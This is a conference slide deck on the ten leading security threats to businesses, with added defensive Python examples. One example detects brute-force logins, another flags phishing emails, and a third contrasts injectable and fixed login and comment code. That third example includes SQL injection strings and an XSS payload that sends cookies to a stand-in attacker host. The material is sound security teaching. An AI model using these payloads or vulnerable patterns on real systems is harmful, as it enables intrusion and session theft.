Date post: 14-Apr-2017 | Category: Business | Upload: auditconferenceseurope
CHAT UP LINE #103
As of April 2015, there were over 8 million web pages offering some sort of free downloadable hacking software.
Pre-Packaged Hacking
Point & click easy
REPORTS VARY
• 42% increase in targeted attacks in 2014.
• 31% of all targeted attacks aimed at businesses with fewer than 250 employees.
• 1 waterhole attack infected 500 organizations in a single day.
• 74 zero-day vulnerabilities.
• 32% of all mobile threats steal information.
• 1 threat infected 600,000 Macs in 2014.
• Spam volume continued to decrease, with 69% of all email being spam.
• The number of phishing sites spoofing social networking sites increased 125%.
• Web-based attacks increased 30%.
• 5,291 new vulnerabilities discovered in 2014, 415 on mobile O/S.
Symantec Global Intelligence Report 2015
10: BRUTE FORCE
• DDoS
• Drop servers to default
• Use default password
• Take admin rights
• Password crackers
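What the "password crackers" and "use default password" bullets look like from the defender's side is a burst of failed logins from one source, often against accounts that ship enabled, followed by a success. The detector below is an added example written for this page, not code from the original deck: it runs over a few constructed sshd-style log lines (sample data, not real logs), flags any source IP with five or more failures inside a five-minute window, notes whether default accounts were among the targets, and reports a success from the same source after the burst, which is the case that needs an incident response rather than just a block. The log format, the year supplied to the parser and the DEFAULT_ACCOUNTS set are assumptions for the example.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sshd-style log lines for the example (not real logs).
SAMPLE_LOG = """\
Apr 14 09:00:01 gw sshd[2001]: Failed password for admin from 203.0.113.9 port 50221 ssh2
Apr 14 09:00:02 gw sshd[2002]: Failed password for root from 203.0.113.9 port 50222 ssh2
Apr 14 09:00:02 gw sshd[2003]: Failed password for invalid user test from 203.0.113.9 port 50223 ssh2
Apr 14 09:00:03 gw sshd[2004]: Failed password for admin from 203.0.113.9 port 50224 ssh2
Apr 14 09:00:04 gw sshd[2005]: Failed password for admin from 203.0.113.9 port 50225 ssh2
Apr 14 09:00:05 gw sshd[2006]: Accepted password for admin from 203.0.113.9 port 50226 ssh2
Apr 14 09:10:00 gw sshd[2010]: Failed password for alice from 198.51.100.7 port 40001 ssh2
Apr 14 09:25:00 gw sshd[2011]: Accepted publickey for alice from 198.51.100.7 port 40002 ssh2
"""

# Assumed list of accounts that ship enabled on most systems and appliances;
# attempts against them are the "use default password" case from the slide.
DEFAULT_ACCOUNTS = {"admin", "root", "administrator", "guest"}

LINE_RE = re.compile(
    r"^(?P<ts>\w{3}\s+\d+\s+\d\d:\d\d:\d\d) \S+ sshd\[\d+\]: "
    r"(?P<result>Failed|Accepted) (?:password|publickey) for (?:invalid user )?"
    r"(?P<user>\S+) from (?P<ip>[\d.]+) port \d+"
)


def parse_line(line, year=2017):
    """Parse one sshd auth line; syslog lines carry no year, so one is supplied."""
    m = LINE_RE.match(line)
    if not m:
        return None
    ts = datetime.strptime(f"{year} {m['ts']}", "%Y %b %d %H:%M:%S")
    return {"ts": ts, "result": m["result"], "user": m["user"], "ip": m["ip"]}


def find_brute_force(log_text, threshold=5, window=timedelta(minutes=5)):
    """Flag source IPs with >= threshold failed logins inside `window`.

    Each alert records which accounts were tried, whether any is a default
    account, and whether a successful login from the same source followed
    the burst (the sign that the guessing worked).
    """
    events = [e for e in (parse_line(l) for l in log_text.splitlines()) if e]
    by_ip = defaultdict(list)
    for e in events:
        by_ip[e["ip"]].append(e)

    alerts = {}
    for ip, evs in by_ip.items():
        evs.sort(key=lambda e: e["ts"])
        fails = [e for e in evs if e["result"] == "Failed"]
        # Sliding window: for each failure, count the failures within `window` after it.
        for i in range(len(fails)):
            j = i
            while j + 1 < len(fails) and fails[j + 1]["ts"] - fails[i]["ts"] <= window:
                j += 1
            if j - i + 1 >= threshold:
                burst_end = fails[j]["ts"]
                success = next(
                    (e for e in evs if e["result"] == "Accepted" and e["ts"] >= burst_end),
                    None,
                )
                tried = sorted({e["user"] for e in fails[i : j + 1]})
                alerts[ip] = {
                    "failures": j - i + 1,
                    "users": tried,
                    "targets_default_accounts": bool(set(tried) & DEFAULT_ACCOUNTS),
                    "success_after_burst": success["user"] if success else None,
                }
                break
    return alerts


if __name__ == "__main__":
    for ip, alert in find_brute_force(SAMPLE_LOG).items():
        print(ip, alert)
```

On the sample data only 203.0.113.9 is flagged: five failures in four seconds against admin, root and test, then an accepted password for admin. The single failure from 198.51.100.7 is a user mistyping and stays below the threshold; tune `threshold` and `window` to your own baseline before alerting on it.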
9: IP EQUIPMENT
• Copiers
• Faxes
• Scanners
• Telephones
• UPS
• Air Conditioning
• Fire alarms
• PABX
• Coffee machines
8: MODEMS
• “Phreaking” still works!
• Every server has a modem port!
• 23% of all external attacks are traced back to previously unidentified modems
• For every 1,000 phone lines there are on average 50 undetected/unprotected modems/ports
MODEMS…
1. Bandwidth Manager
2. Exterior Router
3. Bastion Host (Firewall)
4. Interior Router
5. Network Switch
6. Application Servers
7. Network Storage
8. PBX
9. Voicemail
10. Modem Bank
11. RAS Server
12. Authentication Server
13. UPS
14. Air Conditioning
15. Building Access Control System
7: MALWARE
• Can retrieve whatever it is programmed to find, such as files, folders, address books, log-on IDs, passwords…
• Can execute whatever functions it is programmed to execute: connections, downloads, off/on, find folder: encrypt, copy, delete, save as…
• Limited only by the creativity of the writer.
DEPLOYING SPYWARE
• Key stroke loggers
• Browser trackers
• Mouse trackers
• Address book grabbers
• Password grabbers
• Session hijackers
• OS/application scouts
• Stealth installs
• Desktop hijacks
6: APPLICATION HACKS
Website attacks that enable access to the backend:
– SQL injection
– Cross site scripting
– Session hi-jacking
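The first two items are worth seeing side by side as code. The block below is an added example, not code from the original deck: a login query built by string concatenation next to the same query with bound parameters, and a comment renderer that reflects user text raw next to one that escapes it. The users table, the passwords (stored in clear here only to keep the injection visible; a real application stores a salted hash) and the attacker inputs are all constructed for the example.

```python
import html
import sqlite3


def build_db():
    """In-memory users table with constructed rows (example data only)."""
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, password TEXT, role TEXT)"
    )
    conn.executemany(
        "INSERT INTO users (username, password, role) VALUES (?, ?, ?)",
        [("alice", "correct horse", "admin"), ("bob", "hunter2", "user")],
    )
    return conn


def login_vulnerable(conn, username, password):
    """Builds the SQL by string concatenation, so attacker input is parsed as SQL."""
    sql = (
        "SELECT role FROM users WHERE username = '" + username
        + "' AND password = '" + password + "'"
    )
    row = conn.execute(sql).fetchone()
    return row[0] if row else None


def login_parameterized(conn, username, password):
    """Same query with bound parameters: the driver never parses input as SQL."""
    row = conn.execute(
        "SELECT role FROM users WHERE username = ? AND password = ?",
        (username, password),
    ).fetchone()
    return row[0] if row else None


def render_comment_vulnerable(comment):
    """Reflects user text into the page unchanged: stored/reflected XSS."""
    return '<p class="comment">' + comment + "</p>"


def render_comment_safe(comment):
    """Escapes the HTML metacharacters so the browser shows text, not markup."""
    return '<p class="comment">' + html.escape(comment, quote=True) + "</p>"


# Constructed attacker inputs.
SQLI_COMMENT_OUT_PASSWORD = "alice'-- "   # closes the string literal, comments out the password check
SQLI_TAUTOLOGY = "' OR '1'='1"            # makes the WHERE clause true for every row
XSS_PAYLOAD = "<script>document.location='http://attacker.invalid/?c='+document.cookie</script>"


if __name__ == "__main__":
    conn = build_db()
    print("vulnerable, alice'-- :", login_vulnerable(conn, SQLI_COMMENT_OUT_PASSWORD, "wrong"))
    print("parameterized, alice'-- :", login_parameterized(conn, SQLI_COMMENT_OUT_PASSWORD, "wrong"))
    print(render_comment_safe(XSS_PAYLOAD))
```

Against the concatenated query the input `alice'-- ` logs in as the admin without a password, and the tautology input logs in as whichever row comes first; the parameterized version treats both as literal (non-existent) usernames. The XSS payload above is exactly the session-hijacking case from the third bullet: an unescaped comment that ships the visitor's cookie to an attacker host.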
Web Cam Hacking
Simple script allows you to obtain:
• All information about the cam user (name, picture, location, followers, etc.)
• All devices and operating systems used by the cam user
• All applications and social networks used by the cam user
• All cam log-on and password credentials (e.g. Skype)
• Cam geo-location
• Live cam feeds
• Cam indicator light control
5: MOBILE DEVICES
iPhone Camera Hacking
• Malware
• Stealth installs
• Data interception
• Direct attack
• Call hi-jacking
• VPN hi-jacking
• Session hi-jacking
• Device hi-jacking
4: SOCIAL ENGINEERING
Accessing a system through a user
1. Identify the target
2. Conduct your research
3. Develop a rapport & trust
4. Exploit the trust for information
5. Use to access the system.
TOOLS
• Personal information about you
• Appeal to vanity
• Appeal to authority
• Appeal to human kindness
• Emotional manipulation
• Capitalize on stupidity
• Capitalize on trust
• Eavesdropping
• Chutzpah!
IN PERSON
Posing. Posing is when a hacker disguises himself as someone in authority to get physical access to your systems.
Baiting. Baiting is when a hacker leaves a malware-infected physical device, such as a USB flash drive or CD-ROM, in a place it is sure to be found, like a parking lot, reception area or toilet.
Tailgating. Tailgating is when a hacker follows an authorised employee into an otherwise secure office location to access the IT systems in order to execute an attack.
Dumpster diving. Dumpster diving is just what it says on the tin.
BY TELEPHONE
Pretexting. Pretexting is when a hacker calls and pretends to be someone in authority and requests something from you. It's like posing, only over the telephone.
Quid pro quo. A quid pro quo is when a hacker requests something from you in exchange for something desirable.
BY EMAIL
Phishing. Phishing is when a hacker sends a fraudulent email disguised as a legitimate email claiming to be from a trusted source.
Spear Phishing. Spear phishing is when a hacker sends you a fraudulent email that appears to come from a trusted source you have a specific personal or professional relationship with, such as your bank, your supermarket, or professional or social media connections.
Watering hole. A hacker will inject malware into a legitimate website that companies in the target industry are already likely to visit.
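The email techniques above leave traces a mail filter or an analyst can check for before anyone clicks: a Reply-To that points somewhere other than the claimed sender, a sender domain one character off a trusted one, a link that hides a trusted name inside an attacker-owned domain, and pressure language in the subject. The checker below is an added example written for this page, not code from the original deck. The TRUSTED_DOMAINS allow-list and both messages are constructed for the example (the bank and the attacker hosts are invented), and "registrable domain" is approximated by the last two labels rather than a public-suffix list.

```python
import difflib
import re
from email import message_from_string
from email.utils import parseaddr

# Hypothetical allow-list of domains the recipient organisation actually deals with.
TRUSTED_DOMAINS = {"example.com", "examplebank.com"}

# Constructed messages for the example (not real mail).
SAMPLE_SPEAR_PHISH = """\
From: "Examplebank Security" <alerts@examp1ebank.com>
Reply-To: verify@mail-examplebank-secure.net
To: cfo@example.com
Subject: Urgent: confirm the supplier payment before 17:00

Dear CFO, please confirm the wire transfer via the link below.
http://examplebank.com.account-verify.net/login
"""

SAMPLE_LEGIT = """\
From: "Examplebank" <statements@examplebank.com>
To: cfo@example.com
Subject: Your monthly statement is available

Log in at https://examplebank.com/statements to view it.
"""

URL_HOST_RE = re.compile(r"https?://([^/\s]+)")


def registrable(domain):
    """Crude 'registrable domain': the last two labels (no public-suffix list here)."""
    parts = domain.lower().strip().split(".")
    return ".".join(parts[-2:]) if len(parts) >= 2 else domain.lower()


def lookalike(domain, trusted, cutoff=0.8):
    """Return the trusted domain that `domain` resembles but is not, else None."""
    d = registrable(domain)
    if d in trusted:
        return None
    best = difflib.get_close_matches(d, sorted(trusted), n=1, cutoff=cutoff)
    return best[0] if best else None


def phishing_indicators(raw_message, trusted=TRUSTED_DOMAINS):
    """Return a list of indicator tags found in one RFC 822 message."""
    msg = message_from_string(raw_message)
    from_addr = parseaddr(msg.get("From", ""))[1]
    reply_addr = parseaddr(msg.get("Reply-To", ""))[1]
    from_dom = from_addr.rsplit("@", 1)[-1]
    found = []

    # 1. Replies go somewhere other than the claimed sender's domain.
    if reply_addr and registrable(reply_addr.rsplit("@", 1)[-1]) != registrable(from_dom):
        found.append("reply-to-domain-mismatch")

    # 2. Sender domain is a near-miss of a trusted one (examp1ebank vs examplebank).
    target = lookalike(from_dom, trusted)
    if target:
        found.append(f"sender-lookalike:{target}")

    # 3. Links that bury a trusted name inside an attacker-controlled host.
    for host in URL_HOST_RE.findall(msg.get_payload()):
        for t in trusted:
            if t in host.lower() and registrable(host) != t:
                found.append(f"url-trusted-name-in-untrusted-host:{host}")

    # 4. Pressure language in the subject: the social-engineering lever itself.
    if re.search(r"\b(urgent|immediately|suspended|before \d)", msg.get("Subject", ""), re.I):
        found.append("urgency-language")
    return found


if __name__ == "__main__":
    print("spear phish:", phishing_indicators(SAMPLE_SPEAR_PHISH))
    print("legit:", phishing_indicators(SAMPLE_LEGIT))
```

The spear-phishing sample trips all four checks while the legitimate statement notice trips none. None of these is proof on its own (plenty of real mail uses "urgent"), so treat the tags as a score to route the message for a second look rather than as a verdict.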
3: INSIDERS
The overwhelming majority of SME security incidents this year originated with “insiders”
• IP Theft, Financial Fraud, Procurement Fraud, Insider Trading, Unauthorised applications
• Unauthorised output devices
• Unauthorised connections
• Unauthorised behaviour
• Removable media
CHAT UP LINE #24
“7 out of 10 persons arrested for cyber crime are
employees of the company prosecuting them”
Federal Bureau of Investigation 2010
2: 3RD PARTY SUPPLIERS
[Diagram: Company connected to Supplier 1 through Supplier 9, with a Hacker entering via the supplier side.]
CHAT UP LINE # 13
“Over 75% of reported breaches over the last 18
months were sourced to a trusted connection”. Wired Jan 2015
1: APTs
Highly targeted, sophisticated, long-duration attacks that utilize 0-day vulnerabilities to circumvent traditional security defences and compromise a specific target.
CHARACTERISTICS
• Long term process
• Stealthy & complex delivery
• Utilizing multi ingress/egress vectors
• Insider knowledge (process/product)
• Exploits unrecognized vulnerabilities
• Specific target objective: Retrieve/Take down
• Installs its own back door
• High success rate
1. APTs
2. 3rd Party Suppliers
3. Insiders
4. Social Engineering
5. Mobile Devices
6. Web Applications
7. Malware
8. Modems
9. IP Equipment
10. Brute Force
CURRENT PERCEPTION
1. Hacktivists: Disruption
2. Hackers: Data Theft
3. Cyber Criminals: Fraud
4. Nation States: IP Theft, Disruption
5. Insiders: Fraud, IP Theft
PRIORITY SHOULD BE
1. Insiders: Fraud, IP Theft
2. Cyber Criminals: Fraud
3. Nation States: IP Theft
4. Hackers: Data Theft
5. Hacktivists: Disruption
THINK LIKE A HACKER
1. If Dr. Evil can run his programs on your network, it’s not your network anymore.
2. If Dr. Evil can upload programs to your website, it’s not your website anymore.
3. If Dr. Evil can access data on your network, it’s not your data any more.
4. If Dr. Evil can make changes to the applications or devices on your network, it’s not your network or devices any more.
5. If Dr. Evil uses your network to launch an attack on another network, it’s your problem.
UNDERSTAND EVIL
6. If Dr. Evil can use your network to access your partner’s network, it’s your problem.
7. If Dr. Evil can access your stored data, it’s not your data anymore.
8. More often than not, Dr. Evil works for you.
9. Dr. Evil knows where you hide your spare keys.
10. Mini-me is always faster and smarter.